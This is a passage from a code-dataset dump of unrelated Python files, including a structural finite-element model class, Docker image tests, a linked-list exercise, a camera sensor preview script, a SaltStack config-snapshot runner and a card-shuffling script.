Numbers are assigned according to the order nodes and members\r\n were added to the model.\r\n \r\n \"\"\"\r\n \r\n # Number each node in the model\r\n i = 0\r\n for node in self.__Nodes:\r\n node.ID = i\r\n i += 1\r\n \r\n # Number each member in the model\r\n i = 0\r\n for member in self.__Members:\r\n member.ID = i\r\n i += 1\r\n \r\n#%% \r\n def K(self, Renumber = True):\r\n \"\"\"\r\n Assembles and returns the global stiffness matrix.\r\n \r\n Parameters\r\n ----------\r\n Renumber : boolean\r\n Indicates whether nodes and members should be renumbered prior to\r\n calculating the stiffness matrix. This may be necessary if a model\r\n is being solved for the first time, or if it has been changed since\r\n the last run, potentially creating a gap in the numbering.\r\n \"\"\"\r\n \r\n # Renumber the nodes and members in the model if requested\r\n if Renumber == True:\r\n self.__Renumber()\r\n \r\n # Initialize a zero matrix to hold all the stiffness terms\r\n K = zeros((len(self.__Nodes) * 6, len(self.__Nodes) * 6))\r\n \r\n # Add stiffness terms for each member in the model\r\n for member in self.__Members:\r\n \r\n # Step through each term in the member's stiffness matrix\r\n # 'a' & 'b' below are row/column indices in the member's stiffness matrix\r\n # 'm' & 'n' are corresponding row/column indices in the global stiffness matrix\r\n for a in range(12):\r\n \r\n # Determine if index 'a' is related to the i-node or j-node\r\n if a < 6:\r\n # Find the corresponding index 'm' in the global stiffness matrix\r\n m = member.iNode.ID * 6 + a\r\n else:\r\n # Find the corresponding index 'm' in the global stiffness matrix\r\n m = member.jNode.ID * 6 + (a - 6)\r\n \r\n for b in range(12):\r\n \r\n # Determine if index 'b' is related to the i-node or j-node\r\n if b < 6:\r\n # Find the corresponding index 'n' in the global stiffness matrix\r\n n = member.iNode.ID * 6 + b\r\n else:\r\n # Find the corresponding index 'n' in the global stiffness matrix\r\n n = member.jNode.ID * 6 + (b - 6)\r\n \r\n # Now that 'm' and 'n' are known, place the term in the global stiffness matrix\r\n K.itemset((m, n), K.item((m, n)) + member.K().item((a, b)))\r\n \r\n # Return the global stiffness matrix\r\n return K\r\n \r\n#%% \r\n def FER(self, Renumber = True):\r\n \"\"\"\r\n Assembles and returns the global fixed end reaction vector.\r\n \r\n Parameters\r\n ----------\r\n Renumber : boolean\r\n Indicates whether nodes and members should be renumbered prior to\r\n calculating the fixed end reaction vector. 
This may be necessary if\r\n a model is being solved for the first time, or if it has been\r\n changed since the last run, potentially creating a gap in the\r\n numbering.\r\n \"\"\"\r\n \r\n # Renumber the nodes and members in the model if requested\r\n if Renumber == True:\r\n self.__Renumber()\r\n \r\n # Initialize a zero vector to hold all the terms\r\n FER = zeros((len(self.__Nodes) * 6, 1))\r\n \r\n # Add terms for each member in the model\r\n for member in self.__Members:\r\n \r\n # Step through each term in the member's fixed end reaction vector\r\n # 'a' below is the row index in the member's fixed end reaction vector\r\n # 'm' below is the corresponding row index in the global fixed end reaction vector\r\n for a in range(12):\r\n \r\n # Determine if index 'a' is related to the i-node or j-node\r\n if a < 6:\r\n # Find the corresponding index 'm' in the global fixed end reaction vector\r\n m = member.iNode.ID * 6 + a\r\n else:\r\n # Find the corresponding index 'm' in the global fixed end reaction vector\r\n m = member.jNode.ID * 6 + (a - 6)\r\n \r\n # Now that 'm' is known, place the term in the global fixed end reaction vector\r\n FER.itemset((m, 0), FER[m, 0] + member.fer()[a, 0])\r\n \r\n # Return the global fixed end reaction vector\r\n return FER\r\n \r\n#%%\r\n def P(self, Renumber = True):\r\n \"\"\"\r\n Assembles and returns the global nodal force vector.\r\n \r\n Parameters\r\n ----------\r\n Renumber : boolean\r\n Indicates whether nodes and members should be renumbered prior to\r\n calculating the fixed end reaction vector. This may be necessary if\r\n a model is being solved for the first time, or if it has been\r\n changed since the last run, potentially creating a gap in the\r\n numbering.\r\n \"\"\"\r\n \r\n # Renumber the nodes and members in the model if requested\r\n if Renumber == True:\r\n self.__Renumber()\r\n \r\n # Initialize a zero vector to hold all the terms\r\n P = zeros((len(self.__Nodes) * 6, 1))\r\n \r\n # Add terms for each node in the model\r\n for node in self.__Nodes:\r\n \r\n # Get the node's ID\r\n ID = node.ID\r\n \r\n # Add the node's loads to the global nodal load vector\r\n for load in node.NodeLoads:\r\n \r\n if load[0] == 'FX':\r\n P.itemset((ID * 6 + 0, 0), P[ID * 6 + 0, 0] + load[1])\r\n elif load[0] == 'FY':\r\n P.itemset((ID * 6 + 1, 0), P[ID * 6 + 1, 0] + load[1])\r\n elif load[0] == 'FZ':\r\n P.itemset((ID * 6 + 2, 0), P[ID * 6 + 2, 0] + load[1])\r\n elif load[0] == 'MX':\r\n P.itemset((ID * 6 + 3, 0), P[ID * 6 + 3, 0] + load[1])\r\n elif load[0] == 'MY':\r\n P.itemset((ID * 6 + 4, 0), P[ID * 6 + 4, 0] + load[1])\r\n elif load[0] == 'MZ':\r\n P.itemset((ID * 6 + 5, 0), P[ID * 6 + 5, 0] + load[1])\r\n \r\n # Return the global nodal force vector\r\n return P\r\n \r\n#%%\r\n def D(self):\r\n \"\"\"\r\n Returns the global displacement vector for the model.\r\n \"\"\"\r\n \r\n # Return the global displacement vector\r\n return self.__D\r\n \r\n#%% \r\n def Analyze(self):\r\n \"\"\"\r\n Analyzes the model.\r\n \"\"\"\r\n \r\n # Get the global stiffness matrix and renumber the nodes & members\r\n # in the process of creating it\r\n K = self.K(True)\r\n \r\n # Get the global fixed end reaction vector\r\n FER = self.FER(False)\r\n \r\n # Get the global nodal force vector\r\n P = self.P(False)\r\n \r\n # Eliminate supported degrees of freedom from each of the matrices/vectors\r\n # Work backwards through the node list so that the relationship between\r\n # the DOF's and node ID's is unnafected by the matrices/vectors\r\n # shrinking\r\n for 
node in reversed(self.__Nodes):\r\n \r\n if node.SupportRZ == True:\r\n K = delete(K, node.ID * 6 + 5, axis = 0)\r\n K = delete(K, node.ID * 6 + 5, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 5, axis = 0)\r\n P = delete(P, node.ID * 6 + 5, axis = 0)\r\n \r\n if node.SupportRY == True:\r\n K = delete(K, node.ID * 6 + 4, axis = 0)\r\n K = delete(K, node.ID * 6 + 4, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 4, axis = 0)\r\n P = delete(P, node.ID * 6 + 4, axis = 0)\r\n \r\n if node.SupportRX == True:\r\n K = delete(K, node.ID * 6 + 3, axis = 0)\r\n K = delete(K, node.ID * 6 + 3, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 3, axis = 0)\r\n P = delete(P, node.ID * 6 + 3, axis = 0)\r\n \r\n if node.SupportDZ == True:\r\n K = delete(K, node.ID * 6 + 2, axis = 0)\r\n K = delete(K, node.ID * 6 + 2, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 2, axis = 0)\r\n P = delete(P, node.ID * 6 + 2, axis = 0)\r\n \r\n if node.SupportDY == True:\r\n K = delete(K, node.ID * 6 + 1, axis = 0)\r\n K = delete(K, node.ID * 6 + 1, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 1, axis = 0)\r\n P = delete(P, node.ID * 6 + 1, axis = 0)\r\n \r\n if node.SupportDX == True:\r\n K = delete(K, node.ID * 6 + 0, axis = 0)\r\n K = delete(K, node.ID * 6 + 0, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 0, axis = 0)\r\n P = delete(P, node.ID * 6 + 0, axis = 0)\r\n \r\n # Calculate the global displacement vector\r\n self.__D = matmul(inv(K), subtract(P, FER))\r\n \r\n # Save the displacements as a local variable for easier reference below\r\n D = self.__D\r\n \r\n # Expand the global displacement vector to include supported degrees of freedom\r\n # Work forwards through the node list so that the relationship between\r\n # the DOF's and node ID's is unnafected by the vector expanding\r\n for node in self.__Nodes:\r\n if node.SupportDX == True:\r\n D = insert(D, node.ID * 6 + 0, 0, axis = 0)\r\n if node.SupportDY == True:\r\n D = insert(D, node.ID * 6 + 1, 0, axis = 0)\r\n if node.SupportDZ == True:\r\n D = insert(D, node.ID * 6 + 2, 0, axis = 0)\r\n if node.SupportRX == True:\r\n D = insert(D, node.ID * 6 + 3, 0, axis = 0)\r\n if node.SupportRY == True:\r\n D = insert(D, node.ID * 6 + 4, 0, axis = 0)\r\n if node.SupportRZ == True:\r\n D = insert(D, node.ID * 6 + 5, 0, axis = 0)\r\n\r\n # Store the calculated global nodal displacements into each node\r\n for node in self.__Nodes:\r\n node.DX = D.item((node.ID * 6 + 0, 0))\r\n node.DY = D.item((node.ID * 6 + 1, 0))\r\n node.DZ = D.item((node.ID * 6 + 2, 0))\r\n node.RX = D.item((node.ID * 6 + 3, 0))\r\n node.RY = D.item((node.ID * 6 + 4, 0))\r\n node.RZ = D.item((node.ID * 6 + 5, 0))\r\n \r\n # Calculate and store the reactions at each node\r\n for node in self.__Nodes:\r\n \r\n # Sum the member end forces at the node\r\n for member in self.__Members:\r\n \r\n if member.iNode == node:\r\n \r\n node.RxnFX += member.F()[0, 0]\r\n node.RxnFY += member.F()[1, 0]\r\n node.RxnFZ += member.F()[2, 0]\r\n node.RxnMX += member.F()[3, 0]\r\n node.RxnMY += member.F()[4, 0]\r\n node.RxnMZ += member.F()[5, 0]\r\n \r\n elif member.jNode == node:\r\n \r\n node.RxnFX += member.F()[6, 0]\r\n node.RxnFY += member.F()[7, 0]\r\n node.RxnFZ += member.F()[8, 0]\r\n node.RxnMX += member.F()[9, 0]\r\n node.RxnMY += member.F()[10, 0]\r\n node.RxnMZ += member.F()[11, 0]\r\n \r\n # Sum the joint forces at the node\r\n for load in node.NodeLoads:\r\n \r\n if load[0] == \"FX\":\r\n node.RxnFX -= load[1]\r\n elif load[0] == \"FY\":\r\n node.RxnFY -= load[1]\r\n elif load[0] == \"FZ\":\r\n node.RxnFZ -= 
load[1]\r\n elif load[0] == \"MX\":\r\n node.RxnMX -= load[1]\r\n elif load[0] == \"MY\":\r\n node.RxnMY -= load[1]\r\n elif load[0] == \"MZ\":\r\n node.RxnMZ -= load[1]\r\n \r\n # Segment all members in the model to make member results available\r\n for member in self.__Members:\r\n member.SegmentMember()\r\n\r\n#%% \r\n def Display(self, wireframe=True):\r\n \"\"\"\r\n Displays the members in 3D\r\n\r\n Parameters\r\n ----------\r\n wireframe : boolean\r\n If true, only plot wireframe\r\n \"\"\"\r\n V = Viewer3D()\r\n\r\n for member in self.__Members:\r\n member.Display(V, wireframe)\r\n\r\n V.Run()\r\n\r\n#%% \r\n def DisplayResults(self, result='seq'):\r\n \"\"\"\r\n Displays the members in 3D indicating stress\r\n\r\n Parameters\r\n ----------\r\n result : str\r\n Stress to display - one of: 'seq' (von Mises equivalent), 'sxx' (axial)\r\n \"\"\"\r\n V = Viewer3D()\r\n\r\n for member in self.__Members:\r\n member.DisplayResults(V, result)\r\n\r\n if result == 'seq':\r\n V.ColorBar('Equivalent (von Mises) Stress / Yield Stress',('0','1'))\r\n elif result == 'sxx':\r\n V.ColorBar('Axial Stress / Yield Stress',('-1','1'))\r\n else: # if result == 'txy' or result == 'tzx':\r\n V.ColorBar('Shear Stress / Shear Yield Stress',('-1','1'))\r\n\r\n V.Run(False) # switch off the shader\r\n","sub_path":"PyNite/FEModel3D.py","file_name":"FEModel3D.py","file_ext":"py","file_size_in_byte":26155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239102952","text":"import hashlib\nimport os\nimport shutil\nimport tempfile\n\nimport docker\nimport pytest\n\n\ndef get_file_hash(filepath: str = '') -> str:\n \"\"\"\n Calculates the sha256 hash of a file\n :param filepath: The full path to the file\n :return: The sha256 of the contents of filename\n \"\"\"\n m = hashlib.sha256()\n with open(filepath, 'rb') as f:\n m.update(f.read())\n return m.hexdigest()\n\n\n@pytest.mark.docker\ndef test_container_build():\n \"\"\"\n Build the worker docker image and check the output is\n correct. By default the container will run a sytle transfer on test images\n contained within. 
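
Looking back at `Analyze()` above: trimming supported DOFs with repeated `delete` calls and then solving via `inv(K)` works, but the same partitioning can be done non-destructively with a boolean mask, and `numpy.linalg.solve` avoids forming the inverse explicitly, which is cheaper and better conditioned. A minimal sketch under those assumptions, not PyNite's actual API:

```python
import numpy as np

def solve_free_dofs(K, P, FER, supported):
    """supported: boolean array with one entry per global DOF, True if restrained."""
    free = ~np.asarray(supported, dtype=bool)
    D = np.zeros((K.shape[0], 1))
    # Solve K_ff @ D_f = (P - FER)_f on the free DOFs, leaving supported DOFs at zero
    D[free] = np.linalg.solve(K[np.ix_(free, free)], (P - FER)[free])
    return D
```
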
Check that the network is still producing the same output\n on the new build.\n :return:\n \"\"\"\n\n image_tag = 'style-transfer-worker'\n client = docker.from_env()\n output_dir = tempfile.mkdtemp()\n\n try:\n client.images.build(path='src/style-transfer-worker/',\n nocache=False,\n tag=image_tag)\n\n client.containers.run(image=image_tag,\n volumes={output_dir: {'bind': '/output/',\n 'mode': 'rw'}})\n\n assert get_file_hash(os.path.join(output_dir, 'output.jpg')) == \\\n '8da8a7c86ce0c33291467ce8490848b731f8a015bc02c2fdeb26ca2af6eda94d'\n\n finally:\n shutil.rmtree(output_dir)\n\n\n@pytest.mark.docker\n@pytest.mark.parametrize(\n \"style_image, content_size, expected\",\n [('/input/wave.jpg', '1024',\n '63aa7243d0025dbdad63f27790b6539c2c9e010eb0198a86f2a3c9ba521e5518'),\n ('/input/wave.jpg', '512',\n '1702bef9e580a5467f9ad3373077feebe8be5099892e05121801cb16ae960c69'),\n ('/input/starry_night.jpg', '1024',\n 'cb2005f2db7b306dbf05f87b388e04375c0a8a3fa1d0e93de91caf45439f9ad0')]\n)\ndef test_custom_styles(style_image, content_size, expected):\n \"\"\"\n Test giving a custom content image, style image, and size\n :return:\n \"\"\"\n\n client = docker.from_env()\n output_dir = tempfile.mkdtemp()\n input_dir = os.path.realpath('tests/resources')\n\n try:\n client.containers.run(image='style-transfer-worker',\n volumes={\n output_dir: {'bind': '/output/',\n 'mode': 'rw'},\n input_dir: {'bind': '/input/',\n 'mode': 'ro'}},\n command=[\"--content-image\", \"/input/kyoto.jpg\",\n \"--style-image\", style_image,\n \"--content-size\", content_size])\n\n assert get_file_hash(os.path.join(output_dir, 'output.jpg')) == \\\n expected\n\n finally:\n shutil.rmtree(output_dir)\n","sub_path":"tests/test_style-transfer-worker.py","file_name":"test_style-transfer-worker.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"216349358","text":"\n\"\"\"\nOdd Even Linked List\n\nGiven a singly linked list, group all odd nodes together followed by the even nodes.\nPlease note here we are talking about the node number and not the value in the nodes.\n\nYou should try to do it in place. The program should run in O(1) space complexity and O(nodes) time complexity.\n\nExample:\nGiven 1->2->3->4->5->NULL,\nreturn 1->3->5->2->4->NULL.\n\nNote:\nThe relative order inside both the even and odd groups should remain as it was in the input. 
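
The container tests above pin behavior by comparing a sha256 of `output.jpg` against a golden digest. For large artifacts the same helper can hash in fixed-size chunks instead of reading the whole file at once; a drop-in sketch:

```python
import hashlib

def get_file_hash_chunked(filepath: str, chunk_size: int = 1 << 20) -> str:
    """sha256 of a file, read in chunks so big outputs don't have to fit in memory."""
    m = hashlib.sha256()
    with open(filepath, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            m.update(chunk)
    return m.hexdigest()
```
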
\nThe first node is considered odd, the second node even and so on ...\n\"\"\"\n\n#constructor for a Node of singly linked list\nclass ListNode:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\ndef oddEvenList_Helper(head):\n    #YOUR CODE GOES HERE\n\n    tempOdd=ListNode(0)\n    tempEven=ListNode(0)\n\n    # create a copy to store the actual values\n    # the temp lists get truncated as part of the loop\n    oddList=tempOdd\n    evenList=tempEven\n    \n    # loop through the whole linked list\n    while (head != None):\n        tempOdd.next=head\n        tempEven.next=head.next\n        tempOdd=tempOdd.next\n        tempEven=tempEven.next\n        # printList(tempOdd)\n        # print(\"\")\n        # printList(oddList)\n        # print(\"\")\n\n        # we start on an odd\n        # so pairwise we stop by checking evens\n        if (tempEven != None):\n            head=head.next.next\n        else:\n            head=None\n\n    # link the two lists together\n    tempOdd.next=evenList.next\n    return(oddList.next)\n\n    # printList(oddList)\n    # print(\"\")\n    # printList(evenList)\n    # oddList=head\n    # evenList=head.next\n\n#DO NOT CHANGE THIS FUNCTION\ndef oddEvenList(head):\n    return oddEvenList_Helper(head)\n\n##def lenList(head):\n##    if (head == None):\n##        return(0)\n##    else:\n##        return(1+lenList(head.next))\n    \n    \ndef printList(head):\n    print(head.data,end=\" \")\n    if (head.next != None):\n        printList(head.next)\n    \n\n#test case\ndef main():\n    head = ListNode(1)\n    head.next = ListNode(2)\n    head.next.next = ListNode(3)\n    head.next.next.next = ListNode(4)\n    head.next.next.next.next = ListNode(5)\n    head.next.next.next.next.next = ListNode(6)\n    head.next.next.next.next.next.next = ListNode(7)\n    head = oddEvenList(head)\n    printList(head)\n    # print (\"Expected result: 1, 3, 5, 2, 4\")\n    # print (\"Your result is: \")\n    # printList(head)\n    # print(lenList(head))\n    # print (\"Your result is {}, {}, {}, {}, {}\".format(head.data, head.next.data, head.next.next.data, head.next.next.next.data, head.next.next.next.next.data))\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"problem_1/Fellow Codes Go Here/tai_cai.py","file_name":"tai_cai.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"557495887","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom astropy.tests.helper import remote_data\n\nfrom ...skyview import SkyView\n\n\n@remote_data\ndef test_get_image_list():\n    urls = SkyView().get_image_list(\n        position='Eta Carinae', survey=['Fermi 5', 'HRI', 'DSS'])\n    assert len(urls) == 3\n    for url in urls:\n        assert url.startswith('http://skyview.gsfc.nasa.gov/tempspace/fits/')\n","sub_path":"astroquery/skyview/tests/test_skyview_remote.py","file_name":"test_skyview_remote.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"395035822","text":"import csv \r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nfrom statistics import mean\r\nfrom scipy.stats import gaussian_kde\r\nimport matplotlib.pyplot as plt\r\n\r\nfilename = input('Input filename > ')\r\nfd = open(filename, 'r')\r\nreader = csv.reader(fd, delimiter=',')\r\npoint = []\r\nfor row in tqdm(reader): point.append(np.array(row[2:], dtype='float32'))\r\nfd.close()\r\nlength = len(point)\r\ndist = []\r\nfor i in tqdm(range(length-1)):\r\n    for j in range(i+1, length): dist.append(np.linalg.norm(point[i]-point[j]))\r\ndist = np.array(dist)\r\nprint(np.average(dist))\r\n\r\n
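
The nested loop above builds all n(n-1)/2 pairwise distances in pure Python; SciPy's `pdist` produces the same condensed distance vector in one vectorized call. A sketch, assuming every row parsed into `point` has the same length so the list stacks into an (n, d) array:

```python
import numpy as np
from scipy.spatial.distance import pdist

pts = np.stack(point)   # shape (n, d)
dist = pdist(pts)       # Euclidean distance for every pair, like the loop above
print(np.average(dist))
```
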
limmin = np.percentile(dist, 0.1)\r\nlimmax = np.percentile(dist, 99.9)\r\nls = np.linspace(limmin, limmax, 100)\r\nx = dist\r\nkde = gaussian_kde(x)\r\nplt.plot(ls, kde(ls), label='pairwise distance KDE')\r\nplt.grid(which='major',color='#999999',linestyle='--')\r\nplt.legend(loc='upper right', borderaxespad=1)\r\nplt.show()\r\n","sub_path":"caldist.py","file_name":"caldist.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"297106096","text":"import arducam_mipicamera as arducam\nimport v4l2 #sudo pip install v4l2\nimport time\nimport numpy as np\nimport cv2 #sudo apt-get install python-opencv\nimport math\ndef align_down(size, align):\n    return (size & ~((align)-1))\n\ndef align_up(size, align):\n    return align_down(size + align - 1, align)\n\n# All register stuff is pulled from https://github.com/ArduCAM/ArduCAM_USB_Camera_Shield/commit/1a5ddf36ba80ed7d5a449c2c3a971363df340c91\ndef set_exposure_ms(camera, t):\n    #exp = int(math.floor(t * 1000*1000 / (1e9 * 904 / 80000000)))\n    #camera.write_sensor_reg(0x3501, (exp & 0xFF00) >> 8)\n    #camera.write_sensor_reg(0x3502, (exp & 0x00FF) >> 0)\n    camera.set_control(v4l2.V4L2_CID_EXPOSURE, t*10)\n    print(\"Exposure set to %.1f ms\" % t)\n\ndef set_gain_db(camera, g):\n    gain = int(g) & 0x001F\n    camera.write_sensor_reg(0x3508, gain)\n    print(\"0x3508: 0x%08x\" % (gain))\n\ndef set_analog_gain(camera, g):\n    coarse_gain = int(math.floor(g / 100))\n    fine_gain = int(math.floor((g / 100) % 1 * 100))\n    camera.write_sensor_reg(0x3508, coarse_gain)\n    camera.write_sensor_reg(0x3509, fine_gain)\n    print(\"0x3508: 0x%08x, 0x3509: 0x%08x\" % (coarse_gain, fine_gain))\n\ndef set_fps(camera, fps):\n    vts = int(math.floor(80000000 / (936 * fps)))\n    camera.write_sensor_reg(0x380E, (vts & 0xFF00) >>8)\n    camera.write_sensor_reg(0x380F, (vts & 0x00FF) >>0)\n    print(\"0x380E: 0x%08x, 0x380F: 0x%08x\" % ((vts & 0xFF00) >>8, \n                                              (vts & 0x00FF)>>0))\n\ndef set_controls(camera):\n\n    try:\n        #camera.software_auto_exposure(enable = True)\n        #exp = int(math.floor(exposure_us * 1000 / (1e9 * 904 / 80000000)))\n        #print(\"Exposure reg val: %d\" % exp)\n        #camera.write_sensor_reg(0x3501, (exp & 0xFF00) >> 8)\n        #camera.write_sensor_reg(0x3502, (exp & 0x00FF) >> 0)\n        set_exposure_ms(camera,10)\n    except Exception as e:\n        print(e)\nif __name__ == \"__main__\":\n    outfldr = \"out\"\n    try:\n        camera = arducam.mipi_camera()\n        print(\"Open camera...\")\n        camera.init_camera()\n        camera.set_mode(6) # choose a camera mode which yields raw10 pixel format, see output of list_format utility\n        fmt = camera.get_format()\n        width = fmt.get(\"width\")\n        height = fmt.get(\"height\")\n        print(\"Current resolution is {w}x{h}\".format(w=width, h=height))\n\n        set_controls(camera)\n        set_fps(camera, 1)\n        set_analog_gain(camera, 1000)\n        set_exposure_ms(camera, 10)\n\n        \n        time.sleep(1)\n        i = 0\n        camera.start_preview(fullscreen = False, window = (0, 0, 1600, 1300))\n        time.sleep(10)\n        # print(\"Stop preview...\")\n        camera.stop_preview()\n        print(\"Close camera...\")\n        camera.close_camera()\n    except Exception as e:\n        print(e)\n","sub_path":"RPI/python/ov2311_preview.py","file_name":"ov2311_preview.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"458238138","text":"\r\nimport salt.client\r\nimport sys\r\nimport datetime\r\nimport os\r\nimport re\r\n\r\n\r\ndef _filter_lines(config, filters):\r\n    out_lines = []\r\n    compiled_filters = [re.compile(i) for i in filters]\r\n    for l in config.split('\\n'):\r\n        
filter_line = False\r\n for f in compiled_filters:\r\n if f.match(l):\r\n filter_line = True\r\n if not filter_line:\r\n out_lines.append(l)\r\n return '\\n'.join(out_lines)\r\n\r\n\r\ndef snap(target, name=None):\r\n backup_dir = '/srv/salt/snapshots'\r\n if not os.path.exists(backup_dir):\r\n os.makedirs(backup_dir)\r\n\r\n output = {'snapshots': {}, 'failed':{}}\r\n\r\n #use same timestamp for all files\r\n timestamp = datetime.datetime.utcnow().replace(\r\n microsecond=0).isoformat().replace(':', '')\r\n\r\n local = salt.client.LocalClient()\r\n result = local.cmd(\r\n target,\r\n 'net.config', [],\r\n tgt_type='compound',\r\n kwarg={'source': 'running'})\r\n \r\n for dev, val in result.items():\r\n if name is None:\r\n dst = '{}/{}_{}.conf'.format(backup_dir, dev, timestamp)\r\n else:\r\n dst = '{}/{}_{}.conf'.format(backup_dir, dev, name)\r\n\r\n with open(dst, 'w+') as f:\r\n try:\r\n running_conf = val['out']['running']\r\n except:\r\n output['failed'][dev] = val\r\n continue\r\n\r\n filtered = _filter_lines(running_conf, [\r\n '^Building configuration\\.\\.\\.$',\r\n '^Current configuration\\s*:\\s*\\d+ bytes$'\r\n ])\r\n f.write(filtered)\r\n output['snapshots'][dev] = dst\r\n\r\n return output\r\n","sub_path":"salt/runners/snapshot.py","file_name":"snapshot.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75640683","text":"import random\n\ndeck =[]\nsuits=[\"♠\",\"♥\",\"♦\",\"♣\"]\ncards=[\"A \",\"2 \",\"3 \",\"4 \",\"5 \",\"6 \",\"7 \",\"8 \",\"9 \",\"10\",\"J \",\"Q \",\"K \"]\n\ndef Shuffle(array):\n for a in range(len(array)-2):\n g=random.randint(a,(len(array)-1))\n b=array[a]\n array[a]=array[g]\n array[g]=b\n return(array)\ndef num(string):\n num=0\n for i in range(len(suits)):\n if suits[i] in string:\n num+=i*14\n for j in range(len(cards)):\n if cards[j] in string:\n num+=j\n return(num)\ndef bubbleSort(arr):\n n = len(arr)\n # Traverse through all array elements\n for i in range(n):\n \n # Last i elements are already in place\n for j in range(0, n-i-1):\n \n # traverse the array from 0 to n-i-1\n # Swap if the element found is greater\n # than the next element\n if num(arr[j]) > num(arr[j+1]) :\n arr[j], arr[j+1] = arr[j+1], arr[j]\ndef selection_sort(nums):\n # This value of i corresponds to how many values were sorted\n for i in range(len(nums)):\n # We assume that the first item of the unsorted segment is the smallest\n lowest_value_index = i\n # This loop iterates over the unsorted items\n for j in range(i + 1, len(nums)):\n if num(nums[j]) < num(nums[lowest_value_index]):\n lowest_value_index = j\n # Swap values of the lowest unsorted element with the first unsorted\n # element\n nums[i], nums[lowest_value_index] = nums[lowest_value_index], nums[i]\n\nfor i in suits:\n for j in cards:\n deck.append(f\"{j} of {i}\")\nfor i in range(10):\n deck=Shuffle(deck)\n \nfor d in deck:\n print(d)\nprint(\"now Sort\")\nselection_sort(deck)\nfor d in deck:\n print(d)","sub_path":"Cards.py","file_name":"Cards.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"339355306","text":"#Project 4 - wordFinder\n#Section: 15\n#Name: Angelina Quach\n#Instructor: Sussan Einakian\n# Due date: 25 February 2016\n\nfrom funcs import *\ndef main():\n puzzle = get_puzzle() #asks user for their 100 character long string.\n words_list = get_words() #asks user for their words of interest to search 
for.\n    final_list =[] #Establish an empty list.\n    for word in words_list: #Traverses the list of user-inputted words and looks for each in all directions.\n        final_list = search_puzzle(puzzle, word, final_list) \n    print_puzzle(puzzle) #once all of the words in the words_list are searched for, print out the puzzle and print out where they were found.\n    print \n    print_output(final_list) \n\nmain()\n\n","sub_path":"wordFinder.py","file_name":"wordFinder.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"239424558","text":"\n\nfrom xai.brain.wordbase.verbs._irk import _IRK\n\n#class header\nclass _IRKS(_IRK, ):\n\tdef __init__(self,): \n\t\t_IRK.__init__(self)\n\t\tself.name = \"IRKS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"irk\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_irks.py","file_name":"_irks.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"488368060","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 31 15:07:39 2020\n\n@author: RileyBallachay\n\"\"\"\nfrom Signal import Signal\nfrom Model import Model\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse\nimport matplotlib.transforms as transforms\nimport time\nimport os\n\n# These constants are also defined in the Signal module \n# Don't change here unless you also change them there\nNUMTRIALS = 1000\nbatchSize = 16\nplots = 5\n\nvalPath = '/Users/RileyBallachay/Documents/Fifth Year/RNNSystemIdentification/Model Validation/'\nmodel_paths = [f.path for f in os.scandir(valPath) if f.is_dir()]\n\ninDims = range(1,2)\noutDims = range(1,2)\n\n\ndef confidence_ellipse(x, y, ax, n_std=3.0, facecolor='none', **kwargs):\n    \"\"\"\n    Create a plot of the covariance confidence ellipse of *x* and *y*.\n\n    Parameters\n    ----------\n    x, y : array-like, shape (n, )\n        Input data.\n\n    ax : matplotlib.axes.Axes\n        The axes object to draw the ellipse into.\n\n    n_std : float\n        The number of standard deviations to determine the ellipse's radii.\n\n    **kwargs\n        Forwarded to `~matplotlib.patches.Ellipse`\n\n    Returns\n    -------\n    matplotlib.patches.Ellipse\n    \"\"\"\n    if x.size != y.size:\n        raise ValueError(\"x and y must be the same size\")\n\n    cov = np.cov(x, y)\n    pearson = cov[0, 1]/np.sqrt(cov[0, 0] * cov[1, 1])\n    # Using a special case to obtain the eigenvalues of this\n    # two-dimensional dataset.\n    ell_radius_x = np.sqrt(1 + pearson)\n    ell_radius_y = np.sqrt(1 - pearson)\n    ellipse = Ellipse((0, 0), width=ell_radius_x * 2, height=ell_radius_y * 2,\n                      facecolor=facecolor, **kwargs)\n\n    # Calculating the standard deviation of x from\n    # the square root of the variance and multiplying\n    # with the given number of standard deviations.\n    scale_x = np.sqrt(cov[0, 0]) * n_std\n    mean_x = np.mean(x)\n\n    # calculating the standard deviation of y ...\n    scale_y = np.sqrt(cov[1, 1]) * n_std\n    mean_y = np.mean(y)\n\n    transf = transforms.Affine2D() \\\n        .rotate_deg(45) \\\n        .scale(scale_x, scale_y) \\\n        .translate(mean_x, mean_y)\n\n    ellipse.set_transform(transf + ax.transData)\n    return ax.add_patch(ellipse)\n\n\n\nfor 